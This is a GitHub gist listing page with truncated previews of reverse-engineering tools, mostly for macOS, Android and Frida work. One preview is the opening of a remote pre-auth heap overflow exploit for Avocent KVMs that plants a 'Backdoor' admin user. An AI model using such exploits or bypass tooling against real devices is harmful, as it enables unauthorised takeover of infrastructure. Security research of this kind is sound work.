ApkUnpacker apkunpacker

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

ELF

Compilation

@apkunpacker
apkunpacker / asmpwn.py
Created December 9, 2023 06:59 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211 # this is hardcoded in the binary
    print(f"[*] Exploiting ASMP on {hostname} port {port}")
@apkunpacker
apkunpacker / load_wrapper.cc
Created November 22, 2023 02:12 — forked from singleghost2/load_wrapper.cc
Disable ASLR on macOS for dylib include those loaded with `dlopen`
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <spawn.h>
#include <sys/wait.h>
#include <string.h>
/* ASLR disabling magic constant from Apple LLDB source code
https://opensource.apple.com/source/lldb/lldb-76/tools/darwin-debug/darwin-debug.cpp
*/
@apkunpacker
apkunpacker / outline_graph.py
Created October 25, 2023 10:02 — forked from NyaMisty/outline_graph.py
IDA Graph view with outlined function included
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
from idautils import Segments, Functions, XrefsTo, XrefTypeName
from idc import get_segm_name, get_segm_end
class Dictionary(dict):
    def add(self, key, value):
        self[key] = value
xref_dict = Dictionary()
for segea in Segments():
@apkunpacker
apkunpacker / CorePatchDetector.kt
Created August 3, 2023 16:11 — forked from 5ec1cff/CorePatchDetector.kt
CorePatch detector
package io.github.a13e300.demo.maho
import android.app.PendingIntent
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import android.content.pm.PackageInstaller
import android.content.pm.PackageInstaller.EXTRA_STATUS
import android.content.pm.PackageInstaller.STATUS_PENDING_USER_ACTION
@apkunpacker
apkunpacker / example.txt
Created July 14, 2023 03:58 — forked from jevinskie/example.txt
xnu-unsuspend
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
-> % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time (current threads): 0.046565 s / 0.036279 s
@apkunpacker
apkunpacker / add_debug_entitlement.sh
Created May 24, 2023 14:58 — forked from talaviram/add_debug_entitlement.sh
Simple Utility Script for allowing debug of hardened macOS apps.
#! /bin/bash
# Simple Utility Script for allowing debug of hardened macOS apps.
# This is useful mostly for plug-in developers who would like to keep developing without turning SIP off.
# Credit for idea goes to (McMartin): https://forum.juce.com/t/apple-gatekeeper-notarised-distributables/29952/57?u=ttg
# Update 2022-03-10: Based on Fabian's feedback, add capability to inject DYLD for sanitizers.
#
# Please note:
# - Modern Logic (on M1s) uses `AUHostingService`, which resides within the system and is thus not patchable; it REQUIRES turning off SIP.
# - Some hosts use separate plug-in scanning or sandboxing processes.
#   If that's the case, it's required to patch those (if needed) and attach the debugger to them instead.
@apkunpacker
apkunpacker / restricted.m
Created May 19, 2023 14:25 — forked from aemmitt-ns/restricted.m
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
    void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
    NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
    NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
    NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
@apkunpacker
apkunpacker / child-gating.py
Created May 12, 2023 01:50 — forked from miticollo/child-gating.py
A gist to show an example
import threading
from frida_tools.application import Reactor
import frida
class Application:
    def __init__(self):
        self._stop_requested = threading.Event()